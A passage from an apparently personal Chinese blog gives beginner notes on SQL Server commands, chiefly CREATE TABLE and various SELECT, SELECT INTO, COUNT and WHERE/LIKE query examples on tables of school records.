CREATE DATABASE 进程正在磁盘 ‘learnter_log’ 上分配 0.49 MB 的空间。

默认位置为X:\sql\MSSQL\Dat\下生成learnter.mdf和learnter_log.LDF两个文件。

２　create table table_name(cloumn1 int,cloumn2 char,cloumn3 float): 在默认数据里创建以table_name为名称的表

如执行create table learnter(number int,username char,regtime datetime)就在数据库learnter里创建了有三列number,username,regtime的表learnter。

二　Select

select 是SQL数据操作中最常用的命令，我在使用中犯过几次输成slect的错误，上面的create也输成creat过。select语句范例为：

１　select * from table_name :  从表table_name中查询所有

如　select * from learnter ,会将表learnter中的所有记录显示到查询结果中。

２　 select * into another_table　from table_name :  复制表table_name中所有内容到 表another_table

用于数据备份 ，以免接下来的删除类操作造成数据丢失。

３　select  count(*) from table_name 统计表table_name中的记录数

用于对数据统计，使用 count(distinct *)可排除重复记录，将*换成列名则只对一列内容进行统计。

４　 select * from table_name　where 条件判断语句　：找出符合条件的记录

５　select * into another_table　from table_name　 where 条件判断语句　：将符合条件的记录导入表another_table

６　SELECT COUNT(*) AS Expr1　FROM difff　WHERE (num IN　(SELECT num FROM wfall)) 统计difff表中的num在wfall表中有多少

７　SELECT *　　INTO area_cs　FROM s15　　WHERE (SCHOOL LIKE ‘长沙%’) 　将表s15中校名以长沙开头的记录保存到area_cs

８　 SELECT *　INTO area_wc　FROM s15　WHERE (SCHOOL LIKE ‘望城%’) OR　 (SCHOOL = ‘楠香一中’)　将表s15中校名以望城开头或者校名为楠香一中的记录保存到area_wc

９　SELECT *　INTO area_cs　FROM s15　WHERE (SCHOOL IN(’长沙一中’,'长沙二中’,'长沙三中’,'长沙四中’))将表s15中校名为长沙一中、长沙二中、长沙三中、长沙四中的记录保存到area_cs

Welcome to 学习者网志. This is your first post. Edit or delete it, then start blogging!